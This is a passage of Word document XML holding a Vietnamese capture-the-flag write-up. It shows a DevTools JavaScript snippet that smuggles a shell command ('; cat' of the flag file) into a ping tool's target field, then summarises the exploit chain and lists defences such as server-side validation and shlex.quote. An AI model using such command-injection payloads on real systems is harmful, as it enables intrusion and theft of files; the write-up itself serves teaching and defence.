          <w:p w14:paraId="25B43C02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flag-9d444ad0f475b52e79a1713f25646dce.txt   &lt;-- Flag file!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C03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requirements.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C04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templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43C06" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C07" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phát hi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00AA44"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag-9d444ad0f475b52e79a1713f25646dce.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r>
        <w:t>ằ</w:t>
      </w:r>
      <w:r>
        <w:t>m ngay trong thư m</w:t>
      </w:r>
      <w:r>
        <w:t>ụ</w:t>
      </w:r>
      <w:r>
        <w:t>c /app!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C08" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C09" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.6 Screenshot: Tìm Flag File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C0A" w14:textId="698320DA" w:rsidR="001945C5" w:rsidRDefault="004C4A5D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004C4A5D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66902F73" wp14:editId="70A80E33">
            <wp:extent cx="5943600" cy="2442845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="152699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99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3C0B" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C0C" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.7 Đ</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>c Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C0D" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Đ</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>c n</w:t>
      </w:r>
      <w:r>
        <w:t>ộ</w:t>
      </w:r>
      <w:r>
        <w:t>i dung file flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C0E" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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45C5" w14:paraId="25B43C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B43C0F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const fd = new FormData();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C10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fd.append('target', '127.0.0.1; cat /app/flag-9d444ad0f475b52e79a1713f25646dce.txt');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C11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const res = await fetch('/_sys/cfcd208495d565ef66e7dff9f98764da', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C12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 xml:space="preserve">  method: 'POST', body: fd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C13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});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C14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const data = await res.json();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C15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console.log(data.output);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C16" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5"/>
          <w:p w14:paraId="25B43C17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// Output:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C18" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RS{1_br0k3_17_e6ebced80740d006889f26ceeeee666b}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43C1A" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C1B" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.8 Screenshot: Flag Captured!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C1C" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25B43C35" wp14:editId="25B43C36">
            <wp:extent cx="5715000" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="956173989" name="Picture 956173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3C1D" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C1E" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Tóm T</w:t>
      </w:r>
      <w:r>
        <w:t>ắ</w:t>
      </w:r>
      <w:r>
        <w:t>t Chu</w:t>
      </w:r>
      <w:r>
        <w:t>ỗ</w:t>
      </w:r>
      <w:r>
        <w:t>i Khai Thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C1F" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân tích source HTML dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Phát hi</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>n 2 route dùng MD5 hash c</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t>a s</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nguyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C20" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2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Enumerate route </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → MD5("0") d</w:t>
      </w:r>
      <w:r>
        <w:t>ẫ</w:t>
      </w:r>
      <w:r>
        <w:t>n đ</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>n Network Ping Tool b</w:t>
      </w:r>
      <w:r>
        <w:t>ị</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C21" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân tích JS source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Filter ch</w:t>
      </w:r>
      <w:r>
        <w:t>ữ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cái ch</w:t>
      </w:r>
      <w:r>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> client-side, không có server-side validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C22" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypass qua DevTools Console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → G</w:t>
      </w:r>
      <w:r>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:t>i POST request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command injection payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C23" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Injection thành công</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Th</w:t>
      </w:r>
      <w:r>
        <w:t>ự</w:t>
      </w:r>
      <w:r>
        <w:t>c thi env, ls, cat đ</w:t>
      </w:r>
      <w:r>
        <w:t>ể</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tìm và đ</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>c flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C24" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C25" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="00FF88"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C26" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C27" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RS{1_br0k3_17_e6ebced80740d006889f26ceeeee666b}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C28" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C29" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFAA00"/>
        </w:rPr>
        <w:t>FLAG CAPTURED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C2A" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43C2B" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Bài H</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>c &amp; Phòng Ch</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t>ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C2C" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không dùng client-side validation cho b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o m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M</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>i input validation ph</w:t>
      </w:r>
      <w:r>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:t>i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 xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C2D" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2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Sanitize input trư</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c khi truy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n vào shell:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00AA44"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shlex.quote()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Python) ho</w:t>
      </w:r>
      <w:r>
        <w:t>ặ</w:t>
      </w:r>
      <w:r>
        <w:t>c parameterized commands thay vì n</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t>i chu</w:t>
      </w:r>
      <w:r>
        <w:t>ỗ</w:t>
      </w:r>
      <w:r>
        <w:t>i tr</w:t>
      </w:r>
      <w:r>
        <w:t>ự</w:t>
      </w:r>
      <w:r>
        <w:t>c ti</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>p.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C2E" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ể</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ộ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> route </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n trong source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dùng auth middleware thay vì ch</w:t>
      </w:r>
      <w:r>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:t>n link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C2F" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tránh dùng predictable URL pattern:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MD5 c</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t>a s</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nguyên r</w:t>
      </w:r>
      <w:r>
        <w:t>ấ</w:t>
      </w:r>
      <w:r>
        <w:t>t d</w:t>
      </w:r>
      <w:r>
        <w:t>ễ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> enumerate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43C30" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001945C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02F73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2346DC8"/>
    <w:lvl w:ilvl="0" w:tplc="F07A30CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4EA45EE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C8C4C1EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D0D2B14A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FDF65E54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46F47010">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A4D27C56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="83E69D24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0FA80B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157307"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5768955C"/>
    <w:lvl w:ilvl="0" w:tplc="57EC7572">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="222E92BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CE4A6416">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26CCD5C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F856855C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A41C6612">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5B0EAEC4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0B2A8AC2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BE705576">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29584186"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB42D736"/>
    <w:lvl w:ilvl="0" w:tplc="C1683286">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BE3E0B38">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D0C24DA6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26FE3DFC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="710C31D8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C869BE8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="96049CC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EE4A186E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7C9E4E3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1874686236">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="949779229">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="20699159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C5"/>
    <w:rsid w:val="001945C5"/>
    <w:rsid w:val="00231D71"/>
    <w:rsid w:val="003B6C9C"/>
    <w:rsid w:val="004C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43BA4"/>
  <w15:docId w15:val="{AEFA8DCC-A337-4C31-B174-E6AF5224E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E0E0E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0FF88"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00CC66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4AAF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617</Words>
  <Characters>3521</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>29</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Phúc Quân Trần Hoàng</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-04T13:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-04T13:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>